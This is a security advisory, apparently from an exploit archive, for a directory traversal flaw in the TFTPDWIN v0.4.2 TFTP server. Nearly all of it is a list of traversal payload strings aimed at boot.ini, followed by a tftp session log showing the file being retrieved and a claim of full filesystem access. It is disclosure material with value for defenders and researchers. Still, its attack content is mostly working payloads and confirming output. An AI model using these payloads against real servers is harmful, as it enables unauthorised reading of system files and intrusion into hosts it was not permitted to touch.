TFTPDWIN v0.4.2 Directory Traversal Vulnerability

🗓️ 01 Sep 2010 00:00:00Reported by chr1xType
zdt🔗 0day.today👁 13 Views
TFTPDWIN v0.4.2 Directory Traversal Vulnerability affecting Windows XP PRO SP
=================================================
TFTPDWIN v0.4.2 Directory Traversal Vulnerability
=================================================


Author: chr1x ([email protected])
Affected operating system/software, including full version details
* TFTP Server TFTPDWIN v0.4.2, Tested on Windows XP PRO SP3
 
Download:
http://www.prosysinfo.webpark.pl/sciagnij.html
http://www.versiontracker.com/php/dlpage.php?id=10417389&db=win&pid=10417389&kind=&lnk=http://www.prosysinfo.com.pl/tftpserver/tftpdwin.exe
 
How the vulnerability can be reproduced
 
* Please, use the strings shown below to reproduce the issue.
 
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: \../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
 
Confirmation Log:
 
[email protected]:/# tftp 192.168.1.53
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) ..\..\..\..\..\..\..\boot.ini
Received 211 bytes in 0.0 seconds
tftp>
 
 
What impact the vulnerability has on the vulnerable system
Any additional details that might help in the verification process
 
* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.



#  0day.today [2018-01-04]  #
01 Sep 2010 00:00Current
7.1High risk
Vulners AI Score7.1